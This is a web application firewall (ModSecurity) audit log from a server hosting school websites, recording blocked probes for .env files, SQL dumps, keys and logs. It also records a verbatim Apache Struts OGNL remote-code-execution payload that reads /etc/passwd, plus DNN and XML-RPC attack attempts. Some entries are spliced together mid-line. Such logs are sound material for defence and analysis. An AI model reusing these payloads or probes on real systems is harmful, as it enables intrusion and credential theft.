Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3b0d335-Z-- --965b6805-A-- [28/May/2025:23:16:13 +0700] aDc2zRwBHP_x2VCWa06lbAAAANg 103.236.140.4 56970 103.236.140.4 8181 --965b6805-B-- GET /db_backup.sql HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --965b6805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --965b6805-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448973091182 1632 (- - -) Stopwatch2: 1748448973091182 1632; combined=712, p1=325, p2=360, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --965b6805-Z-- --41a0956f-A-- [28/May/2025:23:16:13 +0700] aDc2zRwBHP_x2VCWa06lbQAAANE 103.236.140.4 56972 103.236.140.4 8181 --41a0956f-B-- GET /dump.sql HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --41a0956f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41a0956f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448973276627 1480 (- - -) Stopwatch2: 1748448973276627 1480; combined=597, p1=300, p2=270, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41a0956f-Z-- --fc5d8e65-A-- [28/May/2025:23:16:15 +0700] aDc2zxwBHP_x2VCWa06legAAANg 103.236.140.4 57000 103.236.140.4 8181 --fc5d8e65-B-- GET /uploads/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fc5d8e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc5d8e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448975954735 639 (- - -) Stopwatch2: 1748448975954735 639; combined=240, p1=214, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc5d8e65-Z-- --f005e318-A-- [28/May/2025:23:16:17 +0700] aDc20RwBHP_x2VCWa06lhAAAAMA 103.236.140.4 57020 103.236.140.4 8181 --f005e318-B-- GET /private.key HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f005e318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f005e318-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448977814621 1690 (- - -) Stopwatch2: 1748448977814621 1690; combined=623, p1=299, p2=292, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f005e318-Z-- --67b3d561-A-- [28/May/2025:23:16:18 +0700] aDc20RwBHP_x2VCWa06lhQAAANc 103.236.140.4 57022 103.236.140.4 8181 --67b3d561-B-- GET /public.key HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --67b3d561-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67b3d561-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448977999809 1477 (- - -) Stopwatch2: 1748448977999809 1477; combined=589, p1=293, p2=269, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67b3d561-Z-- --451b3b53-A-- [28/May/2025:23:16:18 +0700] aDc20hwBHP_x2VCWa06ligAAAME 103.236.140.4 57032 103.236.140.4 8181 --451b3b53-B-- GET /.env.testing HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --451b3b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --451b3b53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448978929292 647 (- - -) Stopwatch2: 1748448978929292 647; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --451b3b53-Z-- --93bb6f18-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06liwAAAMI 103.236.140.4 57034 103.236.140.4 8181 --93bb6f18-B-- GET /.env.staging HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --93bb6f18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93bb6f18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979113541 621 (- - -) Stopwatch2: 1748448979113541 621; combined=240, p1=213, p2=0, p3=0, p4=0, p5=27, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93bb6f18-Z-- --54ec8173-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06ljAAAAMk 103.236.140.4 57036 103.236.140.4 8181 --54ec8173-B-- GET /.env.dev HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --54ec8173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54ec8173-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979297562 619 (- - -) Stopwatch2: 1748448979297562 619; combined=240, p1=214, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54ec8173-Z-- --36a26b74-A-- [28/May/2025:23:16:19 +0700] aDc20xwBHP_x2VCWa06ljQAAAMM 103.236.140.4 57038 103.236.140.4 8181 --36a26b74-B-- GET /.env.backup HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --36a26b74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36a26b74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448979481682 653 (- - -) Stopwatch2: 1748448979481682 653; combined=250, p1=224, p2=0, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36a26b74-Z-- --f905d566-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_pqwAAAFc 103.236.140.4 57046 103.236.140.4 8181 --f905d566-B-- GET /var/log/nginx/access.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f905d566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f905d566-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980224581 1543 (- - -) Stopwatch2: 1748448980224581 1543; combined=644, p1=305, p2=312, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f905d566-Z-- --ea510161-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_prAAAAEo 103.236.140.4 57048 103.236.140.4 8181 --ea510161-B-- GET /var/log/nginx/error.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ea510161-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea510161-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980409558 1513 (- - -) Stopwatch2: 1748448980409558 1513; combined=618, p1=307, p2=285, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea510161-Z-- --0bbb1a15-A-- [28/May/2025:23:16:20 +0700] aDc21BwBHP_x2VCWa06ljwAAAMo 103.236.140.4 57050 103.236.140.4 8181 --0bbb1a15-B-- GET /var/log/apache2/access.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0bbb1a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bbb1a15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980594563 1549 (- - -) Stopwatch2: 1748448980594563 1549; combined=644, p1=311, p2=307, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bbb1a15-Z-- --a8d6a21f-A-- [28/May/2025:23:16:20 +0700] aDc21A3r-0gDryHAyD_prQAAAFY 103.236.140.4 57052 103.236.140.4 8181 --a8d6a21f-B-- GET /var/log/apache2/error.log HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a8d6a21f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8d6a21f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448980779567 1568 (- - -) Stopwatch2: 1748448980779567 1568; combined=657, p1=324, p2=305, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8d6a21f-Z-- --2b9e7823-A-- [28/May/2025:23:51:29 +0700] aDc_EQ3r-0gDryHAyD_sPgAAAE0 103.236.140.4 38278 103.236.140.4 8181 --2b9e7823-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.236.193.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.236.193.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b9e7823-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b9e7823-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748451089300088 2566 (- - -) Stopwatch2: 1748451089300088 2566; combined=1318, p1=505, p2=785, p3=0, p4=0, p5=28, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b9e7823-Z-- --0dc9dc19-A-- [28/May/2025:23:56:57 +0700] aDdAWRwBHP_x2VCWa06sbwAAAMQ 103.236.140.4 53090 103.236.140.4 8181 --0dc9dc19-B-- GET / HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())} Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165493369 --0dc9dc19-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0dc9dc19-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748451417213616 5026 (- - -) Stopwatch2: 1748451417213616 5026; combined=3274, p1=526, p2=2703, p3=0, p4=0, p5=45, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dc9dc19-Z-- --bb236327-A-- [28/May/2025:23:56:57 +0700] aDdAWQ3r-0gDryHAyD_v2wAAAFQ 103.236.140.4 53104 103.236.140.4 8181 --bb236327-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 169271521 --bb236327-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb236327-E-- --bb236327-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 163570984 --f4dffd40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4dffd40-E-- --f4dffd40-H-- Message: Access denied with code 403 (phase 2). Pattern match "system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil& --5827871d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5827871d-E-- --5827871d-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748460337441158 6422 (- - -) Stopwatch2: 1748460337441158 6422; combined=4662, p1=482, p2=3930, p3=33, p4=40, p5=106, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5827871d-Z-- --6d2e6a5b-A-- [29/May/2025:03:07:42 +0700] aDdtDuszXCullgn3bbHjiwAAAAc 103.236.140.4 53536 103.236.140.4 8181 --6d2e6a5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 68.183.199.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 68.183.199.116 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6d2e6a5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d2e6a5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748462862253350 849 (- - -) Stopwatch2: 1748462862253350 849; combined=332, p1=293, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
